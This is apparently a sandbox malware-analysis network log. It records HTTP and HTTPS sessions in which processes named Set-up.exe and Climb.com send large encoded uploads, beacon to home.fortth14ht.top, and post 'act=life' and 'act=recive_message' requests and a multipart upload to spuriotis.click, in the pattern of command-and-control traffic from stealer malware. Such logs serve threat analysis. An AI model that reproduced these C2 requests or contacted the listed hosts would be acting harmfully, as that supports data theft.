Dec 27, 2024 14:51:22.894857883 CET	7416	OUT	Data Raw: 5c 2f 4c 72 5c 2f 30 36 66 79 70 5c 2f 2b 73 41 2b 54 39 31 5c 2f 79 79 37 5c 2f 41 4f 65 44 2b 65 61 68 58 50 33 44 5c 2f 70 4b 66 39 64 66 33 38 50 34 63 5c 2f 77 41 71 35 7a 72 35 33 35 66 31 38 78 6b 33 33 66 6b 6a 2b 66 38 41 31 55 76 5c 2f Data Ascii: \/Lr\/06fyp\/+sA+T91\/yy7\/AOeD+eahXP3D\/pKf9df38P4c\/wAq5zr535f18xk33fkj+f8A1Uv\/AE2\/z16en4wsqeY5T54\/9V5n\/Lf\/AD1\/Sr7fwP8AvH8uX91z3\/Xr+VVm2R42fc\/z\/n68e9BqUxv8v7\/b975mfX\/P+RTPk2un3E8rpz5\/Y88f\/X9DT\/LeP\/VpG\/8Ax8fvPX9Pzo+f5PkEiRxf6z
Dec 27, 2024 14:51:22.894928932 CET	4944	OUT	Data Raw: 62 72 5c 2f 67 6f 62 72 76 37 58 6e 77 6c 31 33 58 66 44 31 76 62 61 55 66 48 76 77 38 31 47 79 38 4e 2b 45 4c 66 34 69 51 2b 41 57 38 56 61 35 6f 5c 2f 68 72 78 5a 66 33 5c 2f 41 49 65 30 66 58 66 47 6e 68 74 50 43 4e 5c 2f 32 33 68 33 57 50 68 Data Ascii: br\/gobrv7Xnwl13XfD1vbaUfHvw81Gy8N+ELf4iQ+AW8Va5o\/hrxZf3\/AIe0fXfGnhtPCN\/23h3WPhD8IfEfxd8J+E\/j3+yZbeJvid+wh4m+Efhb4o+LP2cfjb8bf2cLf4jzfHj4BeMdN8MfED4cfFH9kHx7r\/ihtQ8J+APGurXD69+zLr3g7RdQtfC72muXWu3hTQPoxtI0lmkZtL05mm\/1rNZWxaXgj94TFl+CR82e
Dec 27, 2024 14:51:22.894957066 CET	2472	OUT	Data Raw: 50 31 48 4f 42 55 30 65 5c 2f 35 39 6a 79 66 76 49 76 4e 35 5c 2f 66 38 41 36 66 38 41 36 5c 2f 54 70 51 5c 2f 6e 48 37 69 66 38 73 76 4e 78 5c 2f 71 66 38 35 36 66 7a 6f 38 78 39 72 37 45 38 6c 5c 2f 38 41 70 6e 4c 30 5c 2f 77 41 50 72 33 2b 74 Data Ascii: P1HOBU0e\/59jyfvIvN5\/f8A6f8A6\/TpQ\/nH7if8svNx\/qf856fzo8x9r7E8l\/8ApnL0\/wAPr3+tbe\/\/AHfxNKfX5FaPfuf5Mp5vlCTzf3+e3b0xnvRH\/Fl5N\/8ArTH+X+OBwPSn\/J\/rtkbp5pl8z\/lhN\/k5\/lzmmPv3PvSN\/L\/dSyR\/5\/w7ZqjQG+X98iSTJ5X7r+opm2Nvv\/J\/10\/z744p5Ux\/
Dec 27, 2024 14:51:22.937463045 CET	27192	OUT	Data Raw: 50 72 33 5c 2f 7a 37 30 6c 57 4b 72 30 47 6c 50 72 38 76 31 49 70 46 7a 7a 36 38 48 36 39 76 38 2b 31 56 33 36 5c 2f 68 5c 2f 55 31 64 71 76 49 76 59 66 55 66 34 55 48 54 44 62 35 5c 2f 6f 69 76 54 54 30 66 38 66 5c 2f 51 52 53 2b 58 74 62 5c 2f Data Ascii: Pr3\/z70lWKr0GlPr8v1IpFzz68H69v8+1V36\/h\/U1dqvIvYfUf4UHTDb5\/oivTT0f8f\/QRS+Xtb\/P+fbmloN6fX5fqV6KKKDQrsvU7P8\/U\/wBKhdU\/zz+vb8\/wq1\/37qL+N\/qKDopfZ+f6kFRsifP8nr\/nr27\/AKZqZ\/vH8P5Cj+D\/AIF\/Sg7KfX5fqUG+4\/1P9KhMfy\/55\/w9v8mrD9Px\/oaX+D\/
Dec 27, 2024 14:51:27.689831018 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:51:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49725	185.121.15.192	80	2836	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:51:27.972448111 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 27, 2024 14:51:29.502656937 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:51:29 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49729	185.121.15.192	80	2836	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2024 14:51:29.769951105 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 27, 2024 14:51:31.350415945 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Fri, 27 Dec 2024 13:51:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	34.226.108.155	443	2836	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:09 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-27 13:51:10 UTC	224	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:09 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-27 13:51:10 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49728	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:30 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: spuriotis.click
2024-12-27 13:51:30 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 13:51:31 UTC	1119	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=din0j57en5qo4b3n8vbvirj4a4; expires=Tue, 22 Apr 2025 07:38:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cd3dXwxuZLa0orcFSdrgWpsqq346tqxOE47HuSk7aIW5QycPARSL5tWeAah83LgwRhRGrEcEwFGmTsKD9eh6nnvZ%2BHIwfo7ReppB7QCZ66ZDjyDHVMvglLpc5dlZFOIm5YA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c929187541f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1756&rtt_var=659&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1662870&cwnd=223&unsent_bytes=0&cid=37506ff523963beb&ts=752&x=0"
2024-12-27 13:51:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 13:51:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:32 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: spuriotis.click
2024-12-27 13:51:32 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
2024-12-27 13:51:33 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 13:51:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l7kbjmp8q0oagpce5bg1od2iaa; expires=Tue, 22 Apr 2025 07:38:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hPKMqlokELSg1ZSB5eQMyNVilIA6Em7dYt6RJbUKTdHWTcT6QcdH1oqAzocj4G0BJ%2Fnu17VNcJytGzUw2OGQl0ClAyQqOpFTbhee5WhGHGyHMsWdHN%2FdU5zbOYNXAVY4KTA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f89c935fb74f5f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1651&rtt_var=623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=944&delivery_rate=1751649&cwnd=103&unsent_bytes=0&cid=b2f9f50812f02352&ts=787&x=0"
2024-12-27 13:51:33 UTC	248	IN	Data Raw: 34 36 64 0d 0a 77 36 73 4a 76 37 6c 54 4e 6b 70 42 4e 33 79 6c 48 33 49 5a 71 62 73 50 31 38 58 4a 4a 31 33 47 37 50 51 49 4a 4a 72 62 55 63 71 34 69 58 2b 64 67 32 63 61 61 44 4a 53 58 70 39 72 41 47 7a 4d 6c 79 32 32 6f 65 73 64 4f 36 65 41 68 32 30 49 75 4b 30 38 36 50 6e 4e 61 4e 50 4b 4e 68 70 6f 4a 45 39 65 6e 30 51 4a 4f 38 7a 56 4c 65 33 6e 72 45 30 2f 70 34 43 57 61 55 2f 31 71 7a 32 70 71 38 64 75 31 39 77 77 55 69 73 74 57 68 6e 41 65 68 4e 7a 78 39 4a 69 76 36 6a 72 43 33 2b 6a 6c 74 59 79 42 74 65 2b 4a 61 75 4f 79 6e 72 55 6d 79 34 61 4d 57 4e 53 45 6f 63 6c 55 48 6a 4d 32 57 4f 78 6f 61 4a 50 4e 61 36 49 6c 32 78 4f 36 72 49 33 6f 71 76 4a 62 64 62 57 4f 55 59 6d 4a 31 30 53 78 6e 41 54 4f 34 57 5a 61 71 33 6e 38 77 56 Data Ascii: 46dw6sJv7lTNkpBN3ylH3IZqbsP18XJJ13G7PQIJJrbUcq4iX+dg2caaDJSXp9rAGzMly22oesdO6eAh20IuK086PnNaNPKNhpoJE9en0QJO8zVLe3nrE0/p4CWaU/1qz2pq8du19wwUistWhnAehNzx9Jiv6jrC3+jltYyBte+JauOynrUmy4aMWNSEoclUHjM2WOxoaJPNa6Il2xO6rI3oqvJbdbWOUYmJ10SxnATO4WZaq3n8wV
2024-12-27 13:51:33 UTC	892	IN	Data Raw: 73 6c 6f 32 48 65 31 50 31 71 54 58 6f 76 6f 64 79 6e 64 77 39 46 48 42 6a 58 52 4c 4a 65 42 4e 30 7a 4e 68 74 70 36 69 72 52 6a 65 73 69 70 78 6c 53 66 65 33 4f 61 2b 70 77 47 7a 53 33 44 6c 53 4a 79 41 56 55 49 64 36 43 44 75 54 6d 55 32 6c 70 4b 68 52 4d 72 58 4f 69 53 52 66 75 4c 34 2f 36 50 6d 4a 62 64 50 61 50 46 51 36 4b 31 34 56 77 6d 38 62 63 73 62 55 62 62 69 74 70 45 59 2f 6f 34 53 63 5a 55 7a 38 74 44 36 75 6f 63 6b 72 6b 35 73 32 54 47 68 37 46 54 33 43 62 52 64 33 33 5a 74 58 39 62 6a 6c 58 48 2b 6a 67 74 59 79 42 76 43 38 4d 4b 75 71 78 6d 6a 56 30 43 4e 55 4f 69 56 59 47 39 56 37 46 58 58 42 32 6e 2b 2f 71 61 31 47 4e 71 2b 48 6b 32 31 43 75 50 64 7a 72 37 6d 4a 4d 35 33 36 50 46 38 6b 4b 55 49 65 68 32 4a 65 59 6f 76 65 59 66 58 2f 36 30 Data Ascii: slo2He1P1qTXovodyndw9FHBjXRLJeBN0zNhtp6irRjesipxlSfe3Oa+pwGzS3DlSJyAVUId6CDuTmU2lpKhRMrXOiSRfuL4/6PmJbdPaPFQ6K14Vwm8bcsbUbbitpEY/o4ScZUz8tD6uockrk5s2TGh7FT3CbRd33ZtX9bjlXH+jgtYyBvC8MKuqxmjV0CNUOiVYG9V7FXXB2n+/qa1GNq+Hk21CuPdzr7mJM536PF8kKUIeh2JeYoveYfX/60
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 34 34 61 66 0d 0a 37 4b 78 36 31 70 78 76 63 36 52 5a 67 61 67 2b 54 79 6e 72 73 46 72 33 4e 38 38 55 43 6b 75 57 52 66 45 63 52 78 7a 78 74 56 70 75 71 2b 6a 52 6a 65 32 67 4a 68 73 51 50 69 38 63 2b 62 68 7a 6e 4f 64 67 33 46 77 4a 6a 52 42 46 59 56 49 45 33 58 46 33 6e 76 31 75 4f 56 63 66 36 4f 43 31 6a 49 47 39 72 51 34 70 4b 62 41 61 74 37 62 4f 31 6f 6e 4b 56 30 57 78 33 41 52 63 4d 50 66 59 4c 36 6f 70 45 49 33 70 34 4b 54 5a 30 57 34 39 33 4f 76 75 59 6b 7a 6e 66 34 2f 56 7a 6b 79 46 79 76 45 63 78 35 38 33 5a 6c 79 2b 37 37 72 51 6a 50 6b 31 74 5a 67 51 66 2b 39 50 71 4b 69 7a 57 2f 51 31 44 68 64 49 54 46 66 45 73 6c 76 48 58 48 4f 31 32 47 77 71 4b 74 45 50 71 71 45 6e 53 6f 49 75 4c 34 72 36 50 6d 4a 52 4e 44 4c 49 31 34 6a 4d 68 63 72 78 48 Data Ascii: 44af7Kx61pxvc6RZgag+TynrsFr3N88UCkuWRfEcRxzxtVpuq+jRje2gJhsQPi8c+bhznOdg3FwJjRBFYVIE3XF3nv1uOVcf6OC1jIG9rQ4pKbAat7bO1onKV0Wx3ARcMPfYL6opEI3p4KTZ0W493OvuYkznf4/VzkyFyvEcx583Zly+77rQjPk1tZgQf+9PqKizW/Q1DhdITFfEslvHXHO12GwqKtEPqqEnSoIuL4r6PmJRNDLI14jMhcrxH
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 6d 55 4b 32 73 61 45 46 49 4f 71 58 31 6d 31 4b 75 4f 46 7a 6f 71 33 4e 61 4e 48 53 50 56 6b 70 4a 31 49 54 77 33 30 57 66 63 37 59 5a 72 32 72 70 45 38 7a 6f 49 4b 66 62 45 72 37 75 6a 58 6f 37 34 6c 73 78 5a 74 70 46 41 6b 75 58 68 4c 48 66 67 46 38 69 35 63 74 75 36 47 72 42 57 65 79 6e 6f 46 74 57 62 61 67 63 36 2b 74 69 54 4f 64 30 53 4e 52 4a 69 64 66 47 38 4e 78 47 6e 76 4f 79 32 57 7a 6f 4b 64 4e 4f 71 75 49 6b 32 64 42 38 37 6f 68 75 71 4c 4e 5a 64 47 62 66 78 51 76 4f 78 56 47 68 31 67 48 65 4e 76 66 62 76 57 34 35 56 78 2f 6f 34 4c 57 4d 67 62 34 74 7a 2b 6a 70 73 4a 67 32 64 38 78 57 53 4d 74 57 78 66 4c 64 52 78 38 32 64 52 6f 76 61 32 69 51 44 4f 70 6a 59 52 70 52 37 6a 33 63 36 2b 35 69 54 4f 64 2f 41 4a 6a 43 32 4e 4b 55 4e 34 39 46 33 65 Data Ascii: mUK2saEFIOqX1m1KuOFzoq3NaNHSPVkpJ1ITw30Wfc7YZr2rpE8zoIKfbEr7ujXo74lsxZtpFAkuXhLHfgF8i5ctu6GrBWeynoFtWbagc6+tiTOd0SNRJidfG8NxGnvOy2WzoKdNOquIk2dB87ohuqLNZdGbfxQvOxVGh1gHeNvfbvW45Vx/o4LWMgb4tz+jpsJg2d8xWSMtWxfLdRx82dRova2iQDOpjYRpR7j3c6+5iTOd/AJjC2NKUN49F3e
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 61 53 6b 54 6e 2b 37 77 49 38 71 51 66 54 35 61 2b 69 6d 77 57 50 54 32 44 64 66 4a 43 39 55 46 38 46 34 47 48 7a 45 33 6d 53 79 70 36 31 58 4f 4b 6d 48 6c 6d 46 50 38 72 30 79 6f 2b 47 48 4b 39 72 44 63 51 78 6f 45 56 49 49 31 33 35 51 5a 49 58 41 4c 62 4b 72 36 78 31 2f 71 5a 79 58 62 31 54 38 74 6a 69 36 71 73 39 72 32 4d 6b 32 57 43 49 73 56 68 62 4b 66 68 68 70 79 39 52 74 70 37 57 74 54 6a 48 6b 77 4e 5a 74 58 72 6a 68 63 35 6d 32 77 69 76 43 6c 53 67 55 4c 79 38 56 52 6f 64 2b 47 6e 62 46 79 32 6d 7a 72 4b 68 4c 4e 36 47 47 6b 6d 42 4c 39 37 49 35 6f 61 6e 4a 5a 4e 6a 54 4f 6c 49 6d 49 6c 4d 53 79 6a 31 65 4f 38 7a 42 4c 65 33 6e 6a 46 38 79 6f 70 6d 48 58 30 48 34 36 48 4f 33 37 39 41 72 32 74 64 78 44 47 67 75 57 52 54 4b 65 42 52 7a 7a 4e 70 73 Data Ascii: aSkTn+7wI8qQfT5a+imwWPT2DdfJC9UF8F4GHzE3mSyp61XOKmHlmFP8r0yo+GHK9rDcQxoEVII135QZIXALbKr6x1/qZyXb1T8tji6qs9r2Mk2WCIsVhbKfhhpy9Rtp7WtTjHkwNZtXrjhc5m2wivClSgULy8VRod+GnbFy2mzrKhLN6GGkmBL97I5oanJZNjTOlImIlMSyj1eO8zBLe3njF8yopmHX0H46HO379Ar2tdxDGguWRTKeBRzzNps
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 49 7a 35 4e 62 57 5a 45 76 2b 75 44 4b 67 71 63 6c 74 31 39 38 79 58 53 73 6b 58 42 6a 4d 66 68 70 30 7a 4e 39 70 74 61 79 73 53 7a 6d 68 68 5a 38 71 43 4c 69 2b 4b 2b 6a 35 69 55 33 2b 79 53 4e 6d 4a 69 42 4f 58 74 67 7a 43 54 76 4d 31 53 33 74 35 36 42 4e 4d 4c 61 4c 6e 32 4a 43 38 62 6b 33 6f 71 7a 4f 61 39 6a 57 4e 46 41 6d 4a 31 49 65 79 33 49 58 63 38 54 64 62 62 72 6e 35 51 55 34 76 4d 37 4f 4b 6d 62 7a 72 78 4b 6d 71 74 73 72 77 70 55 6f 46 43 38 76 46 55 61 48 63 78 6c 36 77 39 64 68 76 61 4f 35 52 54 53 74 67 5a 64 6c 52 76 75 34 4f 61 43 7a 7a 32 76 57 30 7a 5a 63 4c 43 31 48 48 38 67 39 58 6a 76 4d 77 53 33 74 35 35 70 54 4f 4b 4f 42 31 45 4e 42 34 37 67 35 71 36 72 46 4b 38 4b 56 4b 42 51 76 4c 78 56 47 68 33 41 63 64 73 2f 4c 59 62 57 6e 6f Data Ascii: Iz5NbWZEv+uDKgqclt198yXSskXBjMfhp0zN9ptaysSzmhhZ8qCLi+K+j5iU3+ySNmJiBOXtgzCTvM1S3t56BNMLaLn2JC8bk3oqzOa9jWNFAmJ1Iey3IXc8Tdbbrn5QU4vM7OKmbzrxKmqtsrwpUoFC8vFUaHcxl6w9dhvaO5RTStgZdlRvu4OaCzz2vW0zZcLC1HH8g9XjvMwS3t55pTOKOB1ENB47g5q6rFK8KVKBQvLxVGh3Acds/LYbWno
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 46 6d 47 39 48 39 4c 4d 30 70 72 50 49 59 64 48 61 4e 6c 4d 6a 4d 56 34 4d 7a 48 55 54 64 63 50 51 62 62 75 6e 71 6b 67 2f 35 4d 44 57 62 56 36 34 34 58 4f 4e 67 74 35 39 31 35 6b 53 51 7a 34 70 55 68 4c 52 64 68 46 34 33 64 52 39 39 65 6e 72 56 44 69 31 7a 73 35 38 56 75 2b 2b 4c 4f 61 34 69 57 7a 52 6d 32 6b 55 49 79 78 62 45 38 78 35 47 58 37 44 32 6d 69 77 72 61 64 4a 50 71 79 48 6e 47 39 44 2f 72 4d 77 70 71 37 49 5a 39 6e 53 50 31 31 6f 62 52 55 5a 33 7a 31 49 4f 2f 33 4a 61 71 32 71 75 77 63 4e 70 35 2b 48 66 30 76 6f 76 33 47 48 6f 73 56 6f 32 4e 77 68 46 44 64 74 54 46 37 41 63 56 41 6a 69 39 6c 70 75 61 53 73 53 7a 43 70 67 5a 46 68 53 66 4b 33 49 61 65 6b 77 57 66 56 31 69 4e 65 49 6a 46 63 46 38 70 7a 47 47 6e 49 6d 53 50 31 6f 4c 4d 46 5a 2b Data Ascii: FmG9H9LM0prPIYdHaNlMjMV4MzHUTdcPQbbunqkg/5MDWbV644XONgt5915kSQz4pUhLRdhF43dR99enrVDi1zs58Vu++LOa4iWzRm2kUIyxbE8x5GX7D2miwradJPqyHnG9D/rMwpq7IZ9nSP11obRUZ3z1IO/3Jaq2quwcNp5+Hf0vov3GHosVo2NwhFDdtTF7AcVAji9lpuaSsSzCpgZFhSfK3IaekwWfV1iNeIjFcF8pzGGnImSP1oLMFZ+
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 64 2b 36 30 49 36 75 6b 7a 6c 58 6a 31 54 5a 41 4c 79 31 54 48 6f 63 7a 55 48 53 4c 67 56 54 31 37 2b 74 36 63 65 53 57 31 6a 49 47 7a 62 6f 39 70 71 62 66 65 70 44 34 4a 6b 49 69 4f 42 63 34 77 47 77 5a 62 63 62 4c 4c 66 76 6e 72 51 56 6e 39 4d 44 57 62 6c 65 34 34 57 50 36 2b 70 77 34 69 6f 74 6a 53 32 59 36 46 51 69 48 4a 55 49 31 69 38 73 74 37 65 66 73 52 69 32 32 69 4a 56 38 52 62 2b 48 44 59 69 71 33 32 72 51 30 44 31 71 46 6a 5a 57 45 4d 6c 36 42 6d 71 4c 6c 79 32 36 35 2f 4e 38 66 2b 7a 4f 71 53 51 47 34 50 6c 72 36 4a 54 4b 5a 64 50 63 4a 30 56 6c 41 31 34 49 78 6e 41 62 64 34 6e 59 59 4b 57 67 36 77 74 2f 6f 73 37 4f 4f 67 69 34 76 53 4c 6f 2b 5a 6b 35 68 6f 35 69 41 33 68 78 53 6c 44 65 50 51 59 37 6b 34 73 6a 39 62 58 72 48 58 2f 6a 6a 59 52 Data Ascii: d+60I6ukzlXj1TZALy1THoczUHSLgVT17+t6ceSW1jIGzbo9pqbfepD4JkIiOBc4wGwZbcbLLfvnrQVn9MDWble44WP6+pw4iotjS2Y6FQiHJUI1i8st7efsRi22iJV8Rb+HDYiq32rQ0D1qFjZWEMl6BmqLly265/N8f+zOqSQG4Plr6JTKZdPcJ0VlA14IxnAbd4nYYKWg6wt/os7OOgi4vSLo+Zk5ho5iA3hxSlDePQY7k4sj9bXrHX/jjYR
2024-12-27 13:51:33 UTC	1369	IN	Data Raw: 44 43 6f 71 6f 6b 6c 6e 64 31 78 44 48 70 74 46 52 72 57 50 55 67 72 6d 59 49 34 35 76 44 37 46 79 44 71 6c 39 5a 38 42 71 44 72 66 65 69 7a 69 54 4f 64 6e 44 4a 47 4f 69 56 57 43 4d 51 36 4c 6b 58 74 32 6d 71 7a 70 4b 56 53 4c 75 61 68 6c 57 46 4b 39 4c 34 6c 6c 70 2f 63 61 4e 50 56 4e 6b 49 35 59 78 74 65 79 44 31 49 51 6f 76 49 5a 37 4c 72 34 77 6b 75 74 34 43 64 66 45 47 34 68 6e 33 6f 75 59 6b 7a 6e 65 34 79 57 69 59 6b 51 77 2b 4b 57 78 4e 38 7a 64 70 6a 6f 72 62 72 43 33 2b 69 7a 73 34 34 43 4c 69 39 49 75 6a 35 6d 54 6d 47 6a 6d 49 44 65 48 46 4b 55 4e 34 39 42 6a 75 54 69 69 50 31 74 65 73 64 66 2b 4f 41 6d 32 74 46 39 72 6f 68 75 71 66 4b 66 64 36 63 44 32 6f 4e 4c 6c 67 62 79 58 6f 75 52 65 72 54 66 62 69 6f 72 48 73 42 6b 35 2b 52 65 67 54 65 Data Ascii: DCoqoklnd1xDHptFRrWPUgrmYI45vD7FyDql9Z8BqDrfeiziTOdnDJGOiVWCMQ6LkXt2mqzpKVSLuahlWFK9L4llp/caNPVNkI5YxteyD1IQovIZ7Lr4wkut4CdfEG4hn3ouYkzne4yWiYkQw+KWxN8zdpjorbrC3+izs44CLi9Iuj5mTmGjmIDeHFKUN49BjuTiiP1tesdf+OAm2tF9rohuqfKfd6cD2oNLlgbyXouRerTfbiorHsBk5+RegTe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49741	104.21.2.51	443	6172	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 13:51:34 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LTKD0MBUJB3AVOU32N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12833 Host: spuriotis.click
